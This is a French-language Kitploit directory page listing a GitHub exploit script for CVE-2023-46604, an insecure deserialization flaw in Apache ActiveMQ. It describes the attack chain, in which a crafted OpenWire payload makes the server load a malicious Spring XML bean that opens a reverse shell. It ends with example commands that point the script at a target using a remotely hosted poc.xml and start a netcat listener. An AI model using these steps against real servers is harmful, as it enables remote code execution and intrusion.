Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-46604 — Le script exploite une vulnérabilité de désérialisation non sécurisée dans Apache ActiveMQ (CVE-2023-46604) | Kitploit
Outils/GitHubGitHub/pulentoski/cve-2023-46604
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCommandement et ContrôleOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubpulentoski/cve-2023-46604

CVE-2023-46604

Le script exploite une vulnérabilité de désérialisation non sécurisée dans Apache ActiveMQ (CVE-2023-46604)

Voir le dépôt
114il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Résumé Technique de l'Attaque : CVE-2023-46604

Le script exploite une vulnérabilité de désérialisation non sécurisée dans Apache ActiveMQ (CVE-2023-46604) pour réaliser une exécution de code à distance sur le serveur cible. Description du Processus d'Exploitation

root@kitploit:~
Objectif de la Vulnérabilité :
    La vulnérabilité réside dans le protocole OpenWire d'Apache ActiveMQ.
    Elle permet la désérialisation non sécurisée d'objets, ce qui peut être utilisé pour exécuter du code arbitraire sur le serveur.

Prérequis :
    Accès réseau au serveur ActiveMQ.
    Un fichier XML malveillant (poc.xml) disponible via une URL accessible par le serveur cible.

Composants de l'Attaque :
    Script Python : Automatise l'envoi de la charge utile malveillante au serveur ActiveMQ.
    Fichier XML (poc.xml) : Contient un bean Spring qui définit l'exécution d'une commande malveillante (par exemple, ouvrir un shell inversé).

Étapes de l'Attaque

root@kitploit:~
Préparation de la Charge Utile :
    Le script construit un message en hexadécimal qui inclut :
        Le nom de la classe Java : org.springframework.context.support.ClassPathXmlApplicationContext.
        L'URL du fichier XML malveillant.
    La charge utile est convertie en une séquence d'octets pouvant être envoyée via le protocole OpenWire.

Envoi de la Charge Utile :
    Le script ouvre une connexion socket TCP vers le serveur ActiveMQ sur le port spécifié (par défaut 61616).
    Il envoie la charge utile malveillante au serveur.

Exécution du Code Malveillant :
    Le serveur ActiveMQ désérialise l'objet spécifié dans la charge utile.
    En raison de la désérialisation non sécurisée, le bean Spring défini dans le fichier XML est chargé et exécuté.
    Ce bean exécute une commande malveillante (par exemple, un shell inversé) sur le serveur.

    _________________________________________________________

exemple d'exécution :

  • python3 CVE-2023-46604.py -i 10.10.11.243 -u http://10.10.16.2/poc.xml

  • nc -lvnp 9001

ce script a été copié et modifié en espagnol : https://github.com/evkl1d/CVE-2023-46604.git

Télécharger l’outil